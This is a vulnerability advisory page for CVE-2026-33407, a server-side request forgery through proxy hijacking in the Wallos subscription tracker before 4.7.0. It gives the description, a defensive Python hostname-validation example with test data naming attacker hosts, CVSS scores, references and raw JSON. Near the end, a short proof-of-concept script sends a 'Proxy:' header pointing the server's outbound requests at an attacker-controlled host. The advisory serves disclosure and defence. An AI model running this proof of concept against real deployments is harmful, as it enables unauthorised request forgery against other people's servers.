Security Vulnerability Report
CVE-2026-33407 CVSS 9.1 CRITICAL

CVE-2026-33407

Published: 2026-03-24 18:16:12
Last Modified: 2026-03-26 20:54:06

Description

Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.7.0, Wallos endpoints/logos/search.php accepts HTTP_PROXY and HTTPS_PROXY environment variables without validation, enabling SSRF via proxy hijacking. The server performs DNS resolution on user-supplied search terms, which can be controlled by attackers to trigger outbound requests to arbitrary domains. This issue has been patched in version 4.7.0.
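The description covers two separate weaknesses that combine into the SSRF: the outbound HTTP client takes its proxy from environment variables it should not trust, and the user-supplied search term is resolved and fetched without being checked. The following is an added example written for this page, not Wallos code and not the project's 4.7.0 fix, showing in Python (standard library only) the checks a hardened logo lookup would apply: the search term is reduced to a bare public hostname, every address it resolves to is tested against loopback, private, link-local, CGNAT and other non-routable ranges before any connection is made, and the HTTP opener is built with an explicit empty proxy map so that HTTP_PROXY/HTTPS_PROXY are never consulted, however they got into the environment. The FAKE_DNS table, the function names and the `.example` hostnames are constructed for the example; only the resolver-injection pattern lets it run offline.

```python
import ipaddress
import re
import socket
import urllib.request
from typing import Callable, Dict, List, Tuple

# One DNS label: alphanumerics with interior hyphens, at most 63 characters.
LABEL_RE = re.compile(r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$")
# CGNAT space is not flagged by ipaddress.is_private but is never a valid target.
EXTRA_BLOCKED = [ipaddress.ip_network("100.64.0.0/10")]
Resolver = Callable[[str], List[str]]


def parse_search_term(term: str) -> str:
    """Reduce a search term to a bare multi-label hostname; reject URLs,
    IP literals and single labels such as 'localhost'."""
    host = term.strip().lower().rstrip(".")
    if not host or len(host) > 253:
        raise ValueError("search term is empty or too long")
    if any(ch in host for ch in "/:@?#\\"):
        raise ValueError("search term must be a bare hostname, not a URL")
    labels = host.split(".")
    if len(labels) < 2 or not all(LABEL_RE.match(label) for label in labels):
        raise ValueError(f"not a valid hostname: {term!r}")
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return host
    raise ValueError("IP literals are not accepted as search terms")


def is_public_ip(ip: str) -> bool:
    """True only for globally routable unicast addresses."""
    addr = ipaddress.ip_address(ip)
    # ::ffff:10.0.0.5 is an IPv4 address in disguise; judge the IPv4 part.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    if any(addr in net for net in EXTRA_BLOCKED):
        return False
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def system_resolver(host: str) -> List[str]:
    """Every A/AAAA answer from the OS resolver (the real thing; not used offline)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def resolve_logo_target(term: str, resolver: Resolver = system_resolver) -> Tuple[str, List[str]]:
    """Validate and resolve; refuse if ANY answer is non-public, so a record that
    mixes one public and one internal address cannot win on round-robin luck."""
    host = parse_search_term(term)
    addresses = resolver(host)
    if not addresses:
        raise ValueError(f"{host} does not resolve")
    blocked = [ip for ip in addresses if not is_public_ip(ip)]
    if blocked:
        raise ValueError(f"{host} resolves to non-public address(es): {blocked}")
    return host, addresses


def decision(term: str, resolver: Resolver = system_resolver) -> str:
    """'allow' or 'deny: <reason>', convenient for logging and tests."""
    try:
        resolve_logo_target(term, resolver)
        return "allow"
    except ValueError as exc:
        return f"deny: {exc}"


def hardened_opener() -> urllib.request.OpenerDirector:
    """ProxyHandler() with no argument calls getproxies(), i.e. reads
    HTTP_PROXY/HTTPS_PROXY (including a value a CGI layer derived from a
    client's 'Proxy:' header). An explicit empty map switches that off."""
    return urllib.request.build_opener(urllib.request.ProxyHandler({}))


def opener_proxies(opener: urllib.request.OpenerDirector) -> Dict[str, str]:
    """The proxy map an opener will actually use (for inspection and tests)."""
    for handler in opener.handlers:
        if isinstance(handler, urllib.request.ProxyHandler):
            return dict(handler.proxies)
    return {}


# Constructed DNS table for the offline demonstration; these are not real records.
FAKE_DNS: Dict[str, List[str]] = {
    "example.com": ["93.184.216.34"],
    "intranet.corp.example": ["10.0.0.5"],
    "metadata.attacker.example": ["169.254.169.254"],
    "roundrobin.attacker.example": ["93.184.216.34", "127.0.0.1"],
    "v6mapped.attacker.example": ["::ffff:10.0.0.5"],
}


def fake_resolver(host: str) -> List[str]:
    return FAKE_DNS.get(host, [])


if __name__ == "__main__":
    for term in list(FAKE_DNS) + ["Example.COM.", "http://example.com/", "localhost", "127.0.0.1"]:
        print(f"{term:30} {decision(term, fake_resolver)}")
    print("hardened opener proxies:", opener_proxies(hardened_opener()))
    print("env proxies urllib would otherwise use:", urllib.request.getproxies())
```

To actually fetch, pass the validated host to `hardened_opener().open(f"https://{host}/favicon.ico", timeout=5)`. Two caveats a reviewer would raise: urllib resolves the name a second time when it connects, so a DNS-rebinding attacker can still change the answer between check and use, and closing that gap needs a client that connects to the already-checked IP; and the same rule applies to PHP's curl extension, where libcurl consults proxy environment variables unless CURLOPT_PROXY is set explicitly (an empty string disables proxying outright).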

CVSS Details

CVSS v3.1 (Primary)
CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

CVSS v4.0 (Secondary)
CVSS Score
8.3
Severity
HIGH
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

The v4.0 vector sets Attack Requirements to Present (AT:P): the score assumes a deployment precondition outside the attacker's direct control, namely that the outbound client picks up proxy settings from the script's environment. Both vectors agree that no privileges or user interaction are needed and that the impact is on confidentiality and availability, not integrity.

Weaknesses
CWE-918 (Server-Side Request Forgery), CWE-922 (Insecure Storage of Sensitive Information)

Configurations (Affected Products)

cpe:2.3:a:wallosapp:wallos:*:*:*:*:*:*:*:* - VULNERABLE
Wallos < 4.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL of the vulnerable Wallos instance (fill in the placeholder).
target_url = "http://<target-ip>/endpoints/logos/search.php"

# The bug is proxy hijacking: the server's outbound HTTP client honours
# HTTP_PROXY / HTTPS_PROXY. In CGI-style deployments a client-supplied
# "Proxy:" request header is exposed to the script as the HTTP_PROXY
# environment variable (the httpoxy header-to-environment mapping); that
# mapping is the assumption this PoC relies on. PHP and most web servers
# shipped mitigations for it in 2016, so it will not hold everywhere.
headers = {"Proxy": "http://<attacker-controlled-ip>:8080"}

# The server resolves and fetches a logo for the user-supplied search term,
# so the outbound request for this domain is what gets redirected.
data = {"search": "example.com"}

try:
    response = requests.post(target_url, headers=headers, data=data, timeout=15)
    print(f"Status Code: {response.status_code}")
    # Success is observed on the attacker side, not in this response:
    # a listener on <attacker-controlled-ip>:8080 receives the server's
    # proxied request (a CONNECT or GET naming example.com).
    print("Check the listener on <attacker-controlled-ip>:8080 for the proxied request.")
except requests.RequestException as e:
    print(f"Error: {e}")

References

https://github.com/ellite/Wallos/security/advisories/GHSA-hhjq-82f8-m6rc (Vendor Advisory, Exploit)
https://github.com/ellite/Wallos/commit/e87387f0ebb540cd33e6dfda7181db9db650ecef#diff-d77202c5d47a3d7d4586e519f6f5e256da5fb2969fa8b9c75c399b2821e9de40 (Patch)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-33407",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-24T18:16:11.627",
    "lastModified": "2026-03-26T20:54:06.227",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.7.0, Wallos endpoints/logos/search.php accepts HTTP_PROXY and HTTPS_PROXY environment variables without validation, enabling SSRF via proxy hijacking. The server performs DNS resolution on user-supplied search terms, which can be controlled by attackers to trigger outbound requests to arbitrary domains. This issue has been patched in version 4.7.0."},
      {"lang": "es", "value": "Wallos es un rastreador de suscripciones personal de código abierto y autoalojable. Antes de la versión 4.7.0, el endpoint de Wallos /logos/search.PHP acepta las variables de entorno HTTP_PROXY y HTTPS_PROXY sin validación, lo que permite SSRF a través del secuestro de proxy. El servidor realiza la resolución DNS en los términos de búsqueda proporcionados por el usuario, que pueden ser controlados por atacantes para activar solicitudes salientes a dominios arbitrarios. Este problema ha sido parcheado en la versión 4.7.0."}
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 8.3,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "PRESENT",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "NONE",
            "vulnAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-918"},
          {"lang": "en", "value": "CWE-922"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:wallosapp:wallos:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "4.7.0",
                "matchCriteriaId": "7376DD5F-C93E-4454-810B-DE04B2DE7032"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/ellite/Wallos/commit/e87387f0ebb540cd33e6dfda7181db9db650ecef#diff-d77202c5d47a3d7d4586e519f6f5e256da5fb2969fa8b9c75c399b2821e9de40",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/ellite/Wallos/security/advisories/GHSA-hhjq-82f8-m6rc",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}